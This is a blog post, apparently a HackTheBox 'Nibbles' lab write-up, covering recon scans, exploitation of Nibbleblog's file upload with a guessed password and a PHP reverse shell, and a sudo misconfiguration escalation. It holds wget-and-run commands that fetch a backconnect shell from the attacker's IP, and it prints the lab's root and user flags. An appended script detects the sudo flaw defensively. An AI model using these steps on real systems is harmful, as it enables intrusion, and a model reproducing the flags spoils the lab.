Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Nibble Linux

Great box, a bit CTF-ish; again, SUDO permissions get you root!

Recon

Nmap scan

CVEs_10.10.10.75.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Nikto scan provides some interesting directories:

+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...
+ OSVDB-3092: /nibbleblog/README: README file found.
+ OSVDB-3092: /nibbleblog/install.php: install.php file found.
+ OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.

Dirbuster scan

Nikto scan

Nibble blog

Exploitation

Nibbleblog 4.0.3 is vulnerable to Arbitrary File Upload. I tried bruteforcing the admin password with Hydra but no luck there. However, I was successful guessing the password: nibble

We upload a PHP reverse shell under the Plugins tab and get a user shell as nibble.

The shell is limited, so we spawn a Python shell:

wget 10.10.14.25/tcp_pty_backconnect.py
python3 tcp_pty_backconnect.py

Privilege Escalation

We run the LinuxEnum script and get our potential priv-esc path:

[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
 (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh

First we mkdir the /personal/stuff directory and then we create a file called monitor.sh.

We echo "bash" to monitor.sh, chmod it 755, proceed to run it with sudo, and finally we get root:

sudo ./monitor.sh
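
As an added example (not part of the original write-up), here is a defender-side check for the misconfiguration used above: it parses `sudo -l` output and reports every component of an allowed command's path that is missing, not owned by root, or group/world-writable. The function names and the embedded sample text are constructed for illustration.

```python
import os
import re
import stat

# Constructed sample: the two rule lines from the `sudo -l` output quoted above.
SAMPLE_SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) [TAG: ...] command[, command ...]" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command_path) for each rule naming an absolute path."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0] if cmd.strip() else ""
            if path.startswith("/"):  # skips the bare "ALL" rule
                rules.append((m.group("runas"), nopasswd, path))
    return rules


def risky_components(path, trusted_uids=(0,)):
    """Walk each component of path; report those a non-root user could alter or create."""
    findings, current = [], os.sep
    for part in [p for p in path.split(os.sep) if p]:
        current = os.path.join(current, part)
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            # A missing target can be created by whoever controls the parent directory.
            findings.append((current, "missing"))
            break
        if st.st_uid not in trusted_uids:
            findings.append((current, "owner uid %d" % st.st_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not stat.S_ISLNK(st.st_mode):
            findings.append((current, "group/world-writable"))
    return findings


if __name__ == "__main__":
    for runas, nopasswd, path in parse_sudo_l(SAMPLE_SUDO_L):
        print(runas, "NOPASSWD" if nopasswd else "PASSWD", path, risky_components(path))
```

Any finding means the sudo rule effectively grants root to whoever controls that path component; the fix is to point the rule at a root-owned script inside root-owned, non-writable directories.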

FLAGS

 ROOT  "b6d745c0dfb6457c55591efc898ef88c" 
 USER  "b02ff32bb332deba49eeaed21152c8d8"